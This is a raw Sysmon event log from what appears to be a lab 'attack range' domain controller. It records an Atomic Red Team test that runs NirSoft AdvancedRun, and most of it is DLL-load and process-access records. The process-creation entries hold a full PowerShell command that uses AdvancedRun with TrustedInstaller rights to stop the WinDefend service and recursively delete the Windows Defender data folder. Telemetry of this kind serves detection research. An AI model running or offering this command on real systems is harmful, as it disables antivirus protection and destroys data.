17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983721Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003983720Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983719Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983718Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983717Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983715Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983714Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983713Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983712Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983711Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003983710Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983709Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983708Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983707Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983706Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983705Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003983643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.305{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 
/RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F46C-61EA-8004-000000002702}592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003983392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.069{834264DD-F46C-61EA-8004-000000002702}592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003983272Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 534500x80000000000000003983271Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003983270Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983269Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983268Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983267Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
